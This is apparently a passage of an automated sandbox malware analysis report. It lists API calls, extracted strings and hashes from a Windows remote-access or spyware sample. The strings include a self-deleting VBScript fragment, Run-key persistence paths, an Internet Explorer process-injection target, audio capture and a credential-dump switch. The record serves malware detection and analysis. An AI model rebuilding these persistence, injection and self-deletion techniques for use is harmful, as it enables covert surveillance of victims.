                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,h5S,0040BC76,?,00472200,pth_unenc,h5S), ref: 0040A801
                                  • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(00000000), ref: 0040A811
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,h5S), ref: 0040A823
                                  • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                • ExitProcess.KERNEL32 ref: 0040C389
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$@8T$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                • API String ID: 1861856835-1753771730
                                • Opcode ID: 5700fb6a6c6df866ef9bb35c697a8cdfed5b8cd8b6a8b4940738935c0824547e
                                • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                                • Opcode Fuzzy Hash: 5700fb6a6c6df866ef9bb35c697a8cdfed5b8cd8b6a8b4940738935c0824547e
                                • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                  • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                • Sleep.KERNEL32(000001F4), ref: 004110E7
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                • GetCurrentProcessId.KERNEL32 ref: 00411114
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: (#G$.exe$@8T$WDH$exepath$open$temp_
                                • API String ID: 2649220323-2455933176
                                • Opcode ID: 50f250ee1fb3edbabcea8393b70c4c82cfc6626be3e876d8b0d3f837c34a7c0b
                                • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                • Opcode Fuzzy Hash: 50f250ee1fb3edbabcea8393b70c4c82cfc6626be3e876d8b0d3f837c34a7c0b
                                • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,h5S), ref: 0040BD63
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,h5S), ref: 0040BDA6
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,h5S), ref: 0040BDB5
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,h5S,0040BC76,?,00472200,pth_unenc,h5S), ref: 0040A801
                                  • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(00000000), ref: 0040A811
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,h5S), ref: 0040A823
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                • ExitProcess.KERNEL32 ref: 0040BFD7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$@8T$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$h5S$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-2020175638
                                • Opcode ID: ed0e6813112b3f903b803d7c7a325247744f1b06bd687a2372c2727e3196b999
                                • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                • Opcode Fuzzy Hash: ed0e6813112b3f903b803d7c7a325247744f1b06bd687a2372c2727e3196b999
                                • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                • SetEvent.KERNEL32 ref: 004191CF
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                • CloseHandle.KERNEL32 ref: 004191F0
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $P0F$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                • API String ID: 738084811-3254062235
                                • Opcode ID: a60c70357fcbf080cedcbd66e2a2348aaac85c1228117943fca9f2eced453a8a
                                • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                • Opcode Fuzzy Hash: a60c70357fcbf080cedcbd66e2a2348aaac85c1228117943fca9f2eced453a8a
                                • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID: @!S
                                • API String ID: 3899193279-4045816191
                                • Opcode ID: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
                                • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                • Opcode Fuzzy Hash: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
                                • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,@8T,00471FFC,?,00000001), ref: 0040DE4E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                  • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                • String ID: @8T$Attempt-S4A0CI$C:\Program Files(x86)\Internet Explorer\$Inj$h5S$ieinstal.exe$ielowutil.exe
                                • API String ID: 193334293-2194314230
                                • Opcode ID: d41619a0dc84c459f3e5139e4e701e8aeaf64f0acb62bb960b5741da55aeeb18
                                • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                • Opcode Fuzzy Hash: d41619a0dc84c459f3e5139e4e701e8aeaf64f0acb62bb960b5741da55aeeb18
                                • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                • _free.LIBCMT ref: 0044E4DF
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044E501
                                • _free.LIBCMT ref: 0044E516
                                • _free.LIBCMT ref: 0044E521
                                • _free.LIBCMT ref: 0044E543
                                • _free.LIBCMT ref: 0044E556
                                • _free.LIBCMT ref: 0044E564
                                • _free.LIBCMT ref: 0044E56F
                                • _free.LIBCMT ref: 0044E5A7
                                • _free.LIBCMT ref: 0044E5AE
                                • _free.LIBCMT ref: 0044E5CB
                                • _free.LIBCMT ref: 0044E5E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID: xF
                                • API String ID: 161543041-2169143296
                                • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                • Sleep.KERNEL32(00000064), ref: 00411C63
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcess
                                • String ID: /stext "$$.F$@#G$@#G
                                • API String ID: 2485855082-2596709126
                                • Opcode ID: 4800a3cd2ec33f803a84813d2caf4c4f2cd1e11b7b0a82ce0590e4472c4b5f67
                                • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                • Opcode Fuzzy Hash: 4800a3cd2ec33f803a84813d2caf4c4f2cd1e11b7b0a82ce0590e4472c4b5f67
                                • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: pF
                                • API String ID: 269201875-2973420481
                                • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: \ws2_32$\wship6$`3A$getaddrinfo
                                • API String ID: 2490988753-1607812672
                                • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                • GetCursorPos.USER32(?), ref: 0041B39E
                                • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                • ExitProcess.KERNEL32 ref: 0041B41A
                                • CreatePopupMenu.USER32 ref: 0041B420
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
